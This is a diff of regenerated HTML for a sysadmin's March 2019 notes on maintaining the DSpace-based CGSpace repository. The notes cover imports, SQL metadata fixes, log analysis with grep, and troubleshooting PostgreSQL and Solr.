@ -1303,12 +1303,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<ul>
<li>I helped Sisay upload the nineteen CTA records from last week via the command line because they required mappings (which is not possible to do via the batch upload web interface)</li>
</ul>
<pre><code>$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
<pre tabindex="0"><code>$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
</code></pre><ul>
<li>Mails from CGSpace stopped working, looks like ICT changed the password again or we got locked out <em>sigh</em></li>
<li>Now I&rsquo;m getting this message when trying to use DSpace&rsquo;s <code>test-email</code> script:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: stfu@google.com
@ -1344,15 +1344,15 @@ Please see the DSpace documentation for assistance.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<p class="blog-post-meta">
<time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -151,7 +151,7 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<ul>
<li>Trying to finally upload IITA&rsquo;s 259 Feb 14 items to CGSpace so I exported them from DSpace Test:</li>
</ul>
<pre><code>$ mkdir 2019-03-03-IITA-Feb14
<pre tabindex="0"><code>$ mkdir 2019-03-03-IITA-Feb14
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
</code></pre><ul>
<li>As I was inspecting the archive I noticed that there were some problems with the bitsreams:
@ -163,7 +163,7 @@ $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
</li>
<li>After adding the missing bitstreams and descriptions manually I tested them again locally, then imported them to a temporary collection on CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
<pre tabindex="0"><code>$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
</code></pre><ul>
<li>DSpace&rsquo;s export function doesn&rsquo;t include the collections for some reason, so you need to import them somewhere first, then export the collection metadata and re-map the items to proper owning collections based on their types using OpenRefine or something</li>
<li>After re-importing to CGSpace to apply the mappings, I deleted the collection on DSpace Test and ran the <code>dspace cleanup</code> script</li>
@ -180,7 +180,7 @@ $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
<li>I suspect it&rsquo;s related to the email issue that ICT hasn&rsquo;t responded about since last week</li>
<li>As I thought, I still cannot send emails from CGSpace:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: blah@stfu.com
@ -197,7 +197,7 @@ Error sending email:
<li>ICT reset the email password and I confirmed that it is working now</li>
<li>Generate a controlled vocabulary of 1187 AGROVOC subjects from the top 1500 that I checked last month, dumping the terms themselves using <code>csvcut</code> and then applying XML controlled vocabulary format in vim and then checking with tidy for good measure:</li>
</ul>
<pre><code>$ csvcut -c name 2019-02-22-subjects.csv &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c name 2019-02-22-subjects.csv &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
$ # apply formatting in XML file
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
</code></pre><ul>
@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
</ul>
</li>
</ul>
<pre><code># journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c &#39;Multiple update components target the same field:solr_update_time_stamp&#39;
1076
</code></pre><ul>
<li>I restarted Tomcat and it&rsquo;s OK now&hellip;</li>
@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
<li>The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms</li>
<li>I see 46 occurrences of these with this query:</li>
</ul>
<pre><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE &#39;%http://feedburner.%&#39; OR text_value LIKE &#39;%http://feeds.feedburner.%&#39;);
</code></pre><ul>
<li>I can replace these globally using the following SQL:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feedburner.&#39;,&#39;https//feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feedburner.%&#39;;
UPDATE 43
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feeds.feedburner.&#39;,&#39;https//feeds.feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feeds.feedburner.%&#39;;
UPDATE 44
</code></pre><ul>
<li>I ran the corrections on CGSpace and DSpace Test</li>
@ -254,7 +254,7 @@ UPDATE 44
<li>Working on tagging IITA&rsquo;s items with their new research theme (<code>cg.identifier.iitatheme</code>) based on their existing IITA subjects (see <a href="/cgspace-notes/2018-02/">notes from 2019-02</a>)</li>
<li>I exported the entire IITA community from CGSpace and then used <code>csvcut</code> to extract only the needed fields:</li>
</ul>
<pre><code>$ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]&#39; ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>
<p>After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a <code>||</code>)</p>
@ -263,7 +263,7 @@ UPDATE 44
<p>I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:</p>
</li>
</ul>
<pre><code>if(isBlank(value), 'PLANT PRODUCTION &amp; HEALTH', value + '||PLANT PRODUCTION &amp; HEALTH')
<pre tabindex="0"><code>if(isBlank(value), &#39;PLANT PRODUCTION &amp; HEALTH&#39;, value + &#39;||PLANT PRODUCTION &amp; HEALTH&#39;)
</code></pre><ul>
<li>Then it&rsquo;s more annoying because there are four IITA subject columns&hellip;</li>
<li>In total this would add research themes to 1,755 items</li>
@ -288,11 +288,11 @@ UPDATE 44
</li>
<li>This is a bit ugly, but it works (using the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL helper function</a> to resolve ID to handle):</li>
</ul>
<pre><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'&quot; | grep -oE '[0-9]{3,}'); do
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE &#39;%SWAZILAND%&#39;&#34; | grep -oE &#39;[0-9]{3,}&#39;); do
echo &quot;Getting handle for id: ${id}&quot;
echo &#34;Getting handle for id: ${id}&#34;
handle=$(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT ds5_item2itemhandle($id)&quot; | grep -oE '[0-9]{5}/[0-9]+')
handle=$(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT ds5_item2itemhandle($id)&#34; | grep -oE &#39;[0-9]{5}/[0-9]+&#39;)
~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
@ -300,7 +300,7 @@ done
</code></pre><ul>
<li>Then I couldn&rsquo;t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:</li>
</ul>
<pre><code>$ grep -oE '201[89]' /tmp/*.csv | sort -u
<pre tabindex="0"><code>$ grep -oE &#39;201[89]&#39; /tmp/*.csv | sort -u
/tmp/94834.csv:2018
/tmp/95615.csv:2018
/tmp/96747.csv:2018
@ -314,7 +314,7 @@ done
<li>CGSpace (linode18) has the blank page error again</li>
<li>I&rsquo;m not sure if it&rsquo;s related, but I see the following error in DSpace&rsquo;s log:</li>
</ul>
<pre><code>2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is closed.
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
</code></pre><ul>
<li>Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, <del>but spikes of over 1,000 today</del>, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently</li>
</ul>
<pre><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-0* | awk -F: &#39;{print $1}&#39; | sort | uniq -c | tail -n 25
5 dspace.log.2019-02-27
11 dspace.log.2019-02-28
29 dspace.log.2019-03-01
@ -356,14 +356,14 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
<li>(Update on 2019-03-23 to use correct grep query)</li>
<li>There are not too many connections currently in PostgreSQL:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
10 dspaceCli
15 dspaceWeb
</code></pre><ul>
<li>I didn&rsquo;t see anything interesting in the PostgreSQL logs, though this stack trace from the Tomcat logs (in the systemd journal) from earlier today <em>might</em> be related?</li>
</ul>
<pre><code>SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
<pre tabindex="0"><code>SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
java.util.EmptyStackException
at java.util.Stack.peek(Stack.java:102)
at java.util.Stack.pop(Stack.java:84)
@ -436,14 +436,14 @@ java.util.EmptyStackException
<li>I copied the 2019 Solr statistics core from CGSpace to DSpace Test and it works (and is only 5.5GB currently), so now we have some useful stats on DSpace Test for the CUA module and the dspace-statistics-api</li>
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(164496) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(164496) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);&#39;
UPDATE 1
</code></pre><h2 id="2019-03-18">2019-03-18</h2>
<ul>
@ -455,7 +455,7 @@ UPDATE 1
</li>
<li>Dump top 1500 subjects from CGSpace to try one more time to generate a list of invalid terms using my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
COPY 1500
dspace=# \q
$ csvcut -c text_value /tmp/2019-03-18-top-1500-subject.csv &gt; 2019-03-18-top-1500-subject.csv
@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
<li>Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (<a href="https://github.com/ilri/DSpace/pull/416">#416</a>)</li>
<li>We are getting the blank page issue on CGSpace again today and I see a <del>large number</del> of the &ldquo;SQL QueryTable Error&rdquo; in the DSpace log again (last time was 2019-03-15):</li>
</ul>
<pre><code>$ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
<pre tabindex="0"><code>$ grep -c &#39;SQL QueryTable Error&#39; dspace.log.2019-03-1[5678]
dspace.log.2019-03-15:929
dspace.log.2019-03-16:67
dspace.log.2019-03-17:72
@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
</code></pre><ul>
<li>Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the &ldquo;binary file matches&rdquo; result with <code>-I</code>:</li>
</ul>
<pre><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-18 | wc -l
8
$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: &#39;{print $1}&#39; | sort | uniq -c
9 dspace.log.2019-03-08
25 dspace.log.2019-03-14
12 dspace.log.2019-03-15
@ -495,7 +495,7 @@ $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F
<li>It seems to be something with grep doing binary matching on some log files for some reason, so I guess I need to always use <code>-I</code> to say binary files don&rsquo;t match</li>
<li>Anyways, the full error in DSpace&rsquo;s log is:</li>
</ul>
<pre><code>2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is closed.
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
</code></pre><ul>
<li>There is a low number of connections to PostgreSQL currently:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
33
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
7 dspaceCli
15 dspaceWeb
</code></pre><ul>
<li>I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:</li>
</ul>
<pre><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &quot;waiting&quot; does not exist at character 217
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &#34;waiting&#34; does not exist at character 217
</code></pre><ul>
<li>This is unrelated and apparently due to <a href="https://github.com/munin-monitoring/munin/issues/746">Munin checking a column that was changed in PostgreSQL 9.6</a></li>
<li>I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it&rsquo;s a Cocoon thing?</li>
<li>Looking in the cocoon logs I see a large number of warnings about &ldquo;Can not load requested doc&rdquo; around 11AM and 12PM:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-18 | grep -oE &#39;2019-03-18 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-18 00:
6 2019-03-18 02:
3 2019-03-18 04:
@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And a few days ago on 2019-03-15 when I happened last it was in the afternoon when it happened and the same pattern occurs then around 12PM:</li>
</ul>
<pre><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-15.xz | grep -oE &#39;2019-03-15 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-15 01:
3 2019-03-15 02:
1 2019-03-15 03:
@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And again on 2019-03-08, surprise surprise, it happened in the morning:</li>
</ul>
<pre><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-08.xz | grep -oE &#39;2019-03-08 [0-9]{2}:&#39; | sort | uniq -c
11 2019-03-08 01:
3 2019-03-08 02:
1 2019-03-08 03:
@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for a pretty confusing debugging&hellip;</li>
<li>I will replace these in the database immediately to save myself the headache later:</li>
</ul>
<pre><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;
count
-------
84
@ -591,7 +591,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>CGSpace (linode18) is having problems with Solr again, I&rsquo;m seeing &ldquo;Error opening new searcher&rdquo; in the Solr logs and there are no stats for previous years</li>
<li>Apparently the Solr statistics shards didn&rsquo;t load properly when we restarted Tomcat <em>yesterday</em>:</li>
</ul>
<pre><code>2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
<pre tabindex="0"><code>2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
...
Caused by: org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
@ -603,7 +603,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For reference, I don&rsquo;t see the <code>ulimit -v unlimited</code> in the <code>catalina.sh</code> script, though the <code>tomcat7</code> systemd service has <code>LimitAS=infinity</code></li>
<li>The limits of the current Tomcat java process are:</li>
</ul>
<pre><code># cat /proc/27182/limits
<pre tabindex="0"><code># cat /proc/27182/limits
Limit Soft Limit Hard Limit Units
Max cpu time unlimited unlimited seconds
Max file size unlimited unlimited bytes
@ -629,8 +629,8 @@ Max realtime timeout unlimited unlimited us
</li>
<li>For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &quot;*.lock&quot; -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>After restarting I confirmed that all Solr statistics cores were loaded successfully&hellip;</li>
@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
<ul>
<li>It&rsquo;s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-20 | grep -oE &#39;2019-03-20 [0-9]{2}:&#39; | sort | uniq -c
3 2019-03-20 00:
12 2019-03-20 02:
$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-21 | grep -oE &#39;2019-03-21 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-21 00:
1 2019-03-21 02:
4 2019-03-21 03:
@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
<ul>
<li>CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-22 00:
69 2019-03-22 01:
1 2019-03-22 02:
@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
323 2019-03-22 21:
685 2019-03-22 22:
357 2019-03-22 23:
$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-23 | grep -oE &#39;2019-03-23 [0-9]{2}:&#39; | sort | uniq -c
575 2019-03-23 00:
445 2019-03-23 01:
518 2019-03-23 02:
@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
<li>I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn&rsquo;t</li>
<li>Trying to drill down more, I see that the bulk of the errors started aroundi 21:20:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 21:[0-9]&#39; | sort | uniq -c
1 2019-03-22 21:0
1 2019-03-22 21:1
59 2019-03-22 21:2
@ -752,11 +752,11 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
</code></pre><ul>
<li>Looking at the Cocoon log around that time I see the full error is:</li>
</ul>
<pre><code>2019-03-22 21:21:34,378 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
<pre tabindex="0"><code>2019-03-22 21:21:34,378 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
</code></pre><ul>
<li>A few milliseconds before that time I see this in the DSpace log:</li>
</ul>
<pre><code>2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
org.postgresql.util.PSQLException: This statement has been closed.
at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
@ -824,7 +824,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>I did some more tests with the <a href="https://github.com/gnosly/TomcatJdbcConnectionTest">TomcatJdbcConnectionTest</a> thing and while monitoring the number of active connections in jconsole and after adjusting the limits quite low I eventually saw some connections get abandoned</li>
<li>I forgot that to connect to a remote JMX session with jconsole you need to use a dynamic SSH SOCKS proxy (as I originally <a href="/cgspace-notes/2017-11/">discovered in 2017-11</a>:</li>
</ul>
<pre><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
</code></pre><ul>
<li>I need to remember to check the active connections next time we have issues with blank item pages on CGSpace</li>
<li>In other news, I&rsquo;ve been running G1GC on DSpace Test (linode19) since 2018-11-08 without realizing it, which is probably a good thing</li>
@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
<ul>
<li>Could be an error in the docs, as I see the <a href="https://commons.apache.org/proper/commons-dbcp/configuration.html">Apache Commons DBCP</a> has -1 as the default</li>
